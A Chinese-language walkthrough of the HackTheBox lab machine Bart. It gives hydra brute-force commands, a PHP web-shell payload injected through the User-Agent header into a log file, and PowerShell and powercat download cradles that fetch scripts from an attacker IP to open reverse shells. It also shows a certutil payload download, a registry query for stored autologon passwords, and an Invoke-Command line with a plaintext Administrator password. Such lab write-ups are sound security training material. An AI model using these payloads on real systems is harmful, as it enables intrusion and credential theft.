Hackthebox-Bart（考点：信息搜集/密码猜解/user-agent注入/window账号利用）

1、 nmap搞起

2、信息搜集&密码猜解

显示forum.bart.htb，把bart和forum.bart都加到/etc/host 里去: 10.10.10.81 forum.bart.htb bart.htb
就一个80端口,进去看看网页,

没啥,ctrl+u看网页源码
在330多行，有他们好几个员工的邮箱,这些可以用来做登录信息,但是现在还没发现哪里登录

于是,扫bart.htb和 forum.bart.htb目录看是否有登陆点,过程很慢, 前者搜到monitor

进去就是登录框,不是很稳定，看到地址栏变成monitor.bart.htb，加进/etc/host,就稳定些

可以试试那几个员工信息,在forget passwords里,随便输入个不相关信息,当然不行,但是输入其中的员工harvey,提示已发重置密码邮件,这就说明harvey帐号是存在的.这个员工全名还有一个potter,尝试输入,直接登录成功.当然,也可以用burp/hydra等破解

进入后看到又是新的dns,

继续添加进host : 10.10.10.81 forum.bart.htb bart.htb monitor.bart.htb internal-01.bart.htb
网页点击internal-01.bart.htb 又是登录框,

这回老密码不好使了,还提示密码8位以上,只好暴力干他
把rockyou剪切成只保留8位以上的

sed -nr '/^.{8,150}$/p' /usr/share/wordlists/rockyou.txt > rockyou8.txt

hydra解密，因为随便输入8位以上报错信息为invalid那句，所以末尾加上这句话

hydra -l harvey -P rockyou8.txt -t 60 internal-01.bart.htb http-form-post "/simple_chat/login.php:uname=^USER^&passwd=^PASS^&submit=Login:F=Invalid Username or Password"

OK,登进去
几个不痛不痒的对话,也看不出啥来,还是ctrl+u

看到这个链接,点开
看到filename=,username=什么这种,就很容易想到注入&文件包含,我自己伪造个shell文件,它就会执行.
前面的选项一个个删，看看如何，点击后都报错
删到只有log.txt，

3、user-agent注入

这里显示浏览器User-agent,说明是有log.txt的，文件里保存着agent的信息，
或许这里可以user-agent注入?或许可以把log.txt换掉,比如换成shell.php?
user-agent试试<?php echo shell_exec($_GET['c'].' 2>&1'); ?>

发送repeater然后send
接着测试

http://internal-01.bart.htb/log/shell.php?c=whoami

ok成功输出,证明有效
那可以在这里直接输入命令了,看之前的扫描是windows,直接用powershell方便快捷

http://internal-01.bart.htb/log/shell.php?c=powershell%20iex(new-object%20net.webclient).downloadstring(%27http://10.10.14.57/Invoke-PowerShellTcp.ps1%27)

之前的chatterbox靶机文章有写了windows，invoke-powershell的弹shell方法.
收到.
不过这个powershell真不好用，什么都报错
只好用powercat再转个普通cmd的shell出来IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.15/powercat.ps1');powercat -c 10.10.14.15 -p 31337 -e cmd。
powercat在github有很多下载的

4、提权

收到搞定.爽歪歪,赶紧用windows的信息搜集技巧看有没账户密码信息,或者此处用powerup.ps1自动扫.这里再用powershell命令倒是舒畅很多!

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
或者用winpeas也可以下载

certutil -urlcache -split -f http://10.10.14.15/winPEAS.exe 666.exe

输入运行C:\inetpub\wwwroot\internal-01\log\666.exe

这信息太明显的,比chatterbox那台机子更明显,直接就是admin了.可以参照chatbox那台机子用impacket包里的psexec.py弹最高shell.这个机子一样也是445开在了内部，照着chatterbox那样转发出来。只不过这个靶机是64版的，所以chisel用64位

也可以参照chatterbox第二种方法。或者稍微改动优化,一个命令搞定(和chatbox一样,弹新shell文件我还是用的2.ps1,端口4445)
当然这只能弹admin的shell，system的才是最高。所以第一种更牛。

powershell.exe -c "$user='WORKGROUP\Administrator'; $pass='3130438f31186fbaf962f407711faddb'; try { Invoke-Command -ScriptBlock { iex(New-Object Net.WebClient).DownloadString('http://10.10.14.57/2.ps1') } -ComputerName BART -Credential (New-Object System.Management.Automation.PSCredential $user,(ConvertTo-SecureString $pass -AsPlainText -Force)) } catch { echo $_.Exception.Message }" 2>&1"

另外4445监听收到,搞定.总结windows机子喜欢考这个账户信息利用